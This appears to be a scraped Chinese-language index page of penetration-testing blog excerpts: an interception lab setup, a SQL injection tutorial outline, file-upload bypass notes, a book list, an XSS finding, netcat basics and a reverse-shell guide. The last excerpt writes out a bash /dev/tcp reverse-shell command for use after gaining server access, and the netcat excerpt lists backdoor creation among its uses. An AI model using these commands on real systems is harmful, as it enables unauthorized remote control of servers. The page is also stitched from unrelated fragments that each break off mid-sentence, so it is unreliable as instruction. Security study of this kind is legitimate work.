一臺kali 一臺msf 網絡採用nat
nat網絡設置方法:
查看路由
配置文件
1 打開攔截
2 訪問baidu,發現瀏覽器開始轉圈
3 出現如下 攔截成功
想學習什麼就去學習吧。
目錄1. sql 注入1.1 sql 注入 介紹1.2 sql 注入 原理1.3 sql 注入 危害1.4 sql 注入 實現方式2. 環境搭建2.1 vmware虛擬機軟件2.2 靶機(學習使用項目環境)2.3 滲透機(學習攻擊
0x00 前言 本週主要學習了文件上傳各種姿勢,掌握了常見的黑白名單後綴繞過、文件內容檢查繞過的原理、實現及簡單防護。 0X01 文件上傳校驗姿勢 o 客戶端javascript校驗(一般只校驗後綴名) o 服務端校驗 o 文件頭
《社會工程:安全體系中的人性漏洞》 《Android應用安全防護和逆向分析》 《逆向工程核心原理》 《Metasploit滲透測試魔鬼訓練營》 《鳥哥linux的私房菜》(第三版) 《Linux二進制分析》 《網絡空間
【漏洞發現與分析】 本地有個軟件系統,burpsuite開啓主動掃描,報了個XSS漏洞: 添加羣組功能的接口: 仔細確認,原本是個post: 漏洞是把請求參數放到get鏈接裏,且能成功執行: 【漏洞利用】: csdn發佈博客,博客
一.概述 netcat是一款基於tcp/ip協議(c/s模型的)的工具。 netcat的功能包括: 數據傳輸 文件傳輸 建立後門 端口轉發 內外網突破 二.基礎使用方法 創建一個服務器端: nc -l -p [local_po
應用場景:某些拿到服務器權限之後,想要設置一個反彈shell。但是目標服務器上沒有安裝Netcat時。 1.反彈shell(bash) 反彈shell命令:bash -i >& /dev/tcp/ip/port 0>&1 pc接